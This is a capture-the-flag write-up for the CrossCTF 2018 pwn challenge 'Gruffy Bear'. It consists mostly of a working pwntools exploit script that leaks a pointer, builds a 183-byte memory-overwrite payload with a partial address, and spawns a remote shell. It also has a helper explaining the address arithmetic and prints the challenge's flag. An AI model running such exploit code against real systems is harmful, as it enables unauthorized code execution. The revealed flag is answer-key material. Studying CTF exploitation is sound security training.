CrossCTF_2018: Gruffy Bear

Category: Pwn
Points: 476
Description:

There's something fishy about this Build-A-Bear workshop... nc ctf.pwn.sg 4002 Creator - amon (@nn_amon)

Write-up

#!/usr/bin/env python
##
# Exploit script for Gruffy Bear (CrossCTF 2018). The tube is called p
# throughout; byte strings are used so the script runs under both
# Python 2 and Python 3 pwntools.
from pwn import *

# Menu option 1: build a bear, answering the four prompts in order
def build(a, b, c, d):
    p.sendline(b"1")
    for field in (a, b, c, d):
        p.recvuntil(b":")
        p.sendline(field)
    p.recvuntil(b"0. Exit")
    p.recvline()

# Create tubing and wait for the first menu
p = remote("ctf.pwn.sg", 4002)
p.recvuntil(b"0. Exit\n")

# Build 13 bears, each with a 0x80-byte name of 'a'
for i in range(0xd):
    build(b"1", b"1", b"1", b"a" * 0x80)

# Attempt to dance
p.sendline(b"1")
p.sendline(b"ENTERTAINUS")
p.recvuntil(b"0. Exit\n")

# Menu option 2: select bear 0
p.sendline(b"2")
p.recvuntil(b": ")
p.sendline(b"0")
p.recvuntil(b"0. Exit")
p.recvline()

# Menu option 4: the bear is printed back; the 6 bytes that follow the
# 0x80 'a's are a leaked 64-bit pointer (top two bytes of a user-space
# address are zero, so pad with two NULs before unpacking)
p.sendline(b"4")
p.recvuntil(b"a" * 0x80)
a = u64(p.recv(6) + b"\x00\x00")
print(hex(a))
p.recvuntil(b"0. Exit")
p.recvline()

# Menu option 3
p.sendline(b"3")
p.recvuntil(b"0. Exit")
p.recvline()

# Menu option 5: write 0xb7 (183) bytes: 176 bytes of padding followed by
# the low 7 bytes of the target address, computed relative to the leak
p.sendline(b"5")
p.recvuntil(b": ")
p.sendline(str(0xb7).encode())
p.recvuntil(b": ")
target = a - 0x844f0 + 0xf02a4
p.sendline(b"d" * 176 + p64(target)[:-1])
p.recvuntil(b"0. Exit")
p.recvline()

# Menu option 7, after which we expect a shell
p.sendline(b"7")

p.clean(3)

p.interactive()
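The two address tricks in the script (padding a 6-byte leak to a qword, and sending only 7 of the 8 bytes of the rebased target) are easy to get wrong offline. The following is an added example, not part of the original write-up, that isolates that arithmetic in plain struct calls so it can be checked without a live target. The leak bytes, the padding length and the two offsets are the script's own values; the sample leak value and the function names are constructed for the example, and the explanation of why the trailing byte is dropped is the usual reasoning, not something the write-up states.

```python
import struct


def leak_to_pointer(leak):
    """Turn a 6-byte little-endian read into a 64-bit value.

    User-space x86-64 pointers have their top two bytes zero, so a
    6-byte leak is enough; pad with two NULs before unpacking.
    """
    if len(leak) != 6:
        raise ValueError("expected exactly 6 leaked bytes, got %d" % len(leak))
    return struct.unpack("<Q", leak + b"\x00\x00")[0]


def rebase(leaked, leaked_offset, target_offset):
    """Move from a leaked pointer to another address in the same mapping.

    leaked_offset is the leaked pointer's distance from the mapping base,
    target_offset the distance of the address we want to write.
    """
    base = leaked - leaked_offset
    if base & 0xfff:
        raise ValueError("rebased base 0x%x is not page aligned" % base)
    return base + target_offset


def partial_qword(addr):
    """Pack addr as 8 little-endian bytes and drop the last one.

    The most significant byte of a user-space pointer is zero, so the
    7-byte write loses nothing, and the trailing NUL never has to be sent
    through an input routine that may treat it as a terminator (assumed
    reason; the write-up does not say).
    """
    packed = struct.pack("<Q", addr)
    if packed[7:8] != b"\x00":
        raise ValueError("0x%x is not a canonical user-space address" % addr)
    return packed[:7]


def build_payload(pad_len, addr, pad=b"d"):
    """Padding followed by the 7-byte partial address, as option 5 expects."""
    return pad * pad_len + partial_qword(addr)


if __name__ == "__main__":
    # Constructed sample leak: little-endian bytes of 0x7ffff7a844f0
    sample_leak = b"\xf0\x44\xa8\xf7\xff\x7f"
    leaked = leak_to_pointer(sample_leak)
    target = rebase(leaked, 0x844f0, 0xf02a4)
    payload = build_payload(176, target)
    print("leak   0x%x" % leaked)
    print("target 0x%x" % target)
    print("payload length %d (0x%x)" % (len(payload), len(payload)))
```

With the constructed leak the payload comes out at 183 bytes, which is the 0xb7 the script announces before sending it; the length check is the quickest way to catch an off-by-one in the padding before touching the remote service.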

Running the exploit drops us into a shell, from which we can read the flag:

$ cat flag
CrossCTF{it_is_almost_midnight_here_in_sf}

Therefore, the flag is CrossCTF{it_is_almost_midnight_here_in_sf}.
